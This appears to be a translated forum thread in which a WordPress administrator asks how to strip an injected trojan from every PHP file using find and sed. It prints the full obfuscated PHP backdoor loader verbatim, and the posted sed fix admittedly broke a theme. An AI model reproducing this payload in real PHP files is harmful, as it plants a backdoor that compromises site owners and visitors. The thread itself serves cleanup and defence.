Suppression de chevaux de Troie Wordpress: Comment utiliser find / sed -i / awk pour supprimer la ligne contenant «$ ua = strtolower» de * .php * de manière récursive?


1

Un cheval de Troie a infecté tous les fichiers * .php sur mon serveur. J'ai utilisé cela pour identifier et lister tous les fichiers:

 grep -nHR "$ua=strtolower" /www/* | cut -d':' -f1

Voici le code:

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $jsikazxpyu = '6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUd_SFSFGFS%x5c%x7860QUUI&c_UO3]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)c%x7827!hmg%x5c%x7825)!gj!|!*1?hu%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x:8297f:5297e:56-%x5c%x7878r.985:5298mg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt4)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%-%x5c%x7825r%x5c%x780LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5czepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827824]25%x5c%x7824-%x5c%x7824-!%x5cx7878;0]=])0#)U!%x5c%x7827{**x5f%155%x61%160%x28%421H*WCw*[!%x5c%x7825r252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265]yx5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-y6gP7L6M7]D4]275]D:M8]Dsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x78!isset($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%15660{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepif((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (u%x5c%x7825)3of)fepdof%x5c%x786057ftbcx787fw6*%x5c%x787f_*#ujox7827u%x5c%x7825)7fmji87fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fwx5c%x7825<#762]67y]562]38y]572]+!<+{e%x5c%x7825+*!*+fepdfe{h+{x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%5c2^-%x5c%x7825hOh%x5c%x782f#824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x786*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x785cq%x5c%x7825%x5c%x7827Y%x539]274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]2787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x7825c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x5%x28%141%x72%162%x61%171%%73", NULL); }%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y72]254]y76#<%x5c%x7825tmw!>!#]y84]27,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x782%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x76Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x78255h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973vd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-q5L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-!>#p#%x5c%x782f#p#%x5c%787f<u%x5c%x7825V%x5c%<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%p%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-11111w6Z6<.3%x5c%x7860hA%x5<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%f#<%x5c%x7825tdz>#L4]271]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e~!dsfbuf%x5c%x7860gvodujpo)##-252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#jQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboec%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860mspn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppdj=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|c%x7825z>>2*!%x5c%x78255c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpq1%154%x28%151%x6d%160%x6c%157%x64%14!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y300#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**W5j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j782f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:op!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c25-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x51#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%:>>1*!%x5c%x7825b:>1<x5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x7}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvu76]258]y6g]273]y76]271]y7d]252]y74]256#<%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfmc5%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x%x75%156%x61"]=1; function fjfgg($n){return chr(ord($n)-1);} @N}#QwTW%x5c%x7825hIr%x5c%x785c1^4y4%x5c%x7824-%x5c%x7%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;]341]88M4P8]37]278]225]241]334]368]322]3]36error_reporting(0); preg_replace("%x2f%50%x2e%52%!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#3]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]judovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x7#O#-#N#*%x5c%x7824%x5c%x78825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1->%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860c]265]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]y76]61]y33]68825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%8256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x7825)dfyfR%x5c%x7827tfs%x5c%x7825{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)FS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%pV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%xx5c%x7825j:.2^,%x5c%x7825b:<!%xubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x78K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#2f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]ycq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*wmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x7Ysboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x782)esp>hmg%x5c%x7825!<sqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhof7825):fmji%x5c%x7878:<##:>:h%x5c%x7x782f%x5c%x7825z<jg!)%x5<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw65c%x7825t2w>#]y74]273]y76]%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%xt%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5cx7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>%x5c%x7827rfs%x5c%x78256~6<%x5c%x7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%25c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!8242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!5-t.98]K4]65]D8]86]y357-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7867;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpx7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#2)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%x5c825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%xc%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x78FHB%x5c%x7860SFTV%x5cx7825}&;ftmbg}%x5c%x787f;!osvufs5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#i25-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%m%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!x7825)323ldfidk!~!<**qp%x5c%x7825!-uyf}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x782782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz<pd%x5c%x7825w6Z6<.5%25!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88yhmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-%x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%x70%154%x69%1644]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53jRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%xfmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x78d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>7>%x5c%x782f7rfs%x5c%x782567860%x5c%x785c^>Ew:Qb:Qc:W~!x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%7878:!>#]y3g]61]y3f]63]y3:]68]y76#%x7827K6<%x5c%x787fw6*3qj%x5c%xx5c%x787f_*#[k2%x5c%x7860{6:!}:]84#-!OVMM*<%x22%51%x29%51%x2978257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmAfw6*%x5c%x787f_*#fubfsdXk5%x5c%x78z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~5]y83]273]y76]277#<%xx29%57%x65","%x65%166%x6%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cInbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+q5c%x7825tzw%x5c%x782f%x5c%x782#]y81]273]y76]258]y6g]273]y76]271]y7d]e>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U3]317]445]212]445]43]321]464]284]364]6]234]342]58]24]325j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ox7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npdc%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5ssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x782fs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttf/(.*)/epreg_replacezsydsjxoda'; $gwzjflvjgn = explode(chr((167-123)),'1340,60,1221,64,4846,62,5108,49,9305,24,3897,36,2006,26,842,22,8439,63,9329,64,8992,34,6815,54,8259,21,996,48,2350,54,3055,22,7632,53,4578,43,5902,59,116,41,3128,60,1462,22,1044,42,6360,42,8857,27,7459,40,7083,34,1904,37,7268,64,563,36,9026,31,9118,69,6895,64,7795,69,6253,69,6472,39,508,35,1813,30,3396,53,9187,34,1285,55,6576,56,1484,67,1760,53,6024,34,0,46,6121,63,1438,24,8624,43,7117,34,9057,30,7332,66,6959,58,3449,60,2464,59,7763,32,8015,41,3761,51,7685,57,7864,51,5199,36,8403,36,6322,38,8280,70,9699,58,8734,54,4451,67,157,32,395,47,6685,20,5695,39,2860,49,6058,63,2177,36,4351,62,2523,49,7017,66,9801,55,718,62,2138,39,2963,40,3003,52,7499,67,4728,51,9437,40,1109,54,3835,62,9900,42,653,65,5534,58,46,28,7742,21,4961,44,7398,61,2764,55,7977,38,1400,38,8056,54,4779,67,2572,47,2819,41,4621,67,10038,68,6705,51,7915,62,1582,31,8788,69,5734,43,6184,38,2742,22,3598,69,9545,61,2909,54,6511,65,297,62,5005,60,599,54,813,29,189,52,5469,65,927,69,1843,61,5339,62,2101,37,9284,21,6869,26,3285,48,3077,51,4413,38,8350,53,9942,36,8110,41,7566,66,6756,35,5235,48,5592,44,1551,31,4299,52,5401,42,7197,50,9507,38,884,43,780,33,2281,69,5843,59,8949,43,9757,44,9978,60,4940,21,1700,60,9660,39,1613,58,8912,37,3667,43,3255,30,5636,59,3710,51,8151,52,1163,58,7151,46,9393,44,3333,63,3509,52,9856,44,2686,33,864,20,4908,32,543,20,1671,29,4109,67,6632,53,2404,60,359,36,7247,21,3211,44,8566,58,5283,56,2046,55,1086,23,3188,23,2619,67,74,42,8203,56,5961,63,3561,37,5065,43,8502,64,9606,54,4518,39,241,56,4246,53,2213,68,4176,70,4557,21,5157,42,6222,31,1941,65,8884,28,3981,61,2719,23,6791,24,3812,23,9221,63,8667,67,9477,30,442,66,5443,26,6402,70,4688,40,3933,48,5777,66,4042,67,9087,31,2032,14'); $xmardksupn=substr($jsikazxpyu,(45923-35817),(48-41)); if (!function_exists('jqtycdwglc')) { function jqtycdwglc($tutcgbfyga, $uspwicgair) { $fadtmurxrp = NULL; for($fcsoyutzvq=0;$fcsoyutzvq<(sizeof($tutcgbfyga)/2);$fcsoyutzvq++) { $fadtmurxrp .= substr($uspwicgair, $tutcgbfyga[($fcsoyutzvq*2)],$tutcgbfyga[($fcsoyutzvq*2)+1]); } return $fadtmurxrp; };} $yymyiypvji="\x20\57\x2a\40\x62\172\x69\150\x67\163\x74\171\x69\162\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\61\x33\55\x31\67\x36\51\x29\54\x20\143\x68\162\x28\50\x33\66\x30\55\x32\66\x38\51\x29\54\x20\152\x71\164\x79\143\x64\167\x67\154\x63\50\x24\147\x77\172\x6a\146\x6c\166\x6a\147\x6e\54\x24\152\x73\151\x6b\141\x7a\170\x70\171\x75\51\x29\51\x3b\40\x2f\52\x20\144\x62\172\x7a\145\x70\152\x65\143\x67\40\x2a\57\x20"; $kssqaiublz=substr($jsikazxpyu,(61036-50923),(58-46)); $kssqaiublz($xmardksupn, $yymyiypvji, NULL); $kssqaiublz=$yymyiypvji; $kssqaiublz=(455-334); $jsikazxpyu=$kssqaiublz-1; ?>

Si j'essaye: find . -name *.php -type f -print0 | xargs -0 sed -i 's/[that code here]//g'

Sed ne le prendra pas. Il n'aime pas!, (,) Et éventuellement ". Crache une erreur.

Pouvez-vous penser à un moyen créatif de désinfecter tous ces fichiers? Je crois que le code peut être unique pour chaque fichier, randomisé de certaines manières ...

Le jeton "$ ua = strtolower" est présent dans chacun d'eux. Par conséquent, si je peux supprimer toutes les lignes de chaque * .php contenant "$ ua = strtolower", je peux supprimer le cheval de Troie.



Ils y arrivent via xmlrpc.php. J'ai des journaux de force brute massive ... Nous avons mis à niveau à 15.04 afin qu'ils ne puissent plus enraciner la boîte .. Au moins je pense .. rpcbind était en cours d'exécution et je sais que c'est mauvais, il reste à vérifier si la version 15.xx d'Ubuntu Server inclut rpcbind. Ils avaient un spambot sur notre dernière installation (nous avons dû réinstaller) ...

ne désinfectez pas - vous devez reconstruire et confirmer que vos paramètres et vos plugins ne vous le permettront pas.
schroeder

En ce qui concerne la question telle que posée, il s'agit d'une question de script bash et non d'une question d'InfoSec.
schroeder

D'accord. Eh bien, je veux supprimer le cheval de Troie de tous les fichiers, tout sauvegarder, puis réinstaller. Nous bloquerons le point d'entrée de l'attaquant. Nous pensons que cela est lié à la force brute et placer un reCAPTCHA sur toutes nos connexions Wordpress pourrait résoudre le problème.
Charles Thompson

Réponses:


1

résolu

find . -name *.php -type f -print0 | xargs -0 sed -i.bak '/$ua=strtolower/d'

Cela a foiré mon thème pour Wordpress mais je l’ai restauré à partir de la sauvegarde. Quelque chose à propos de la <?php ne pas être là ...

En utilisant notre site, vous reconnaissez avoir lu et compris notre politique liée aux cookies et notre politique de confidentialité.
Licensed under cc by-sa 3.0 with attribution required.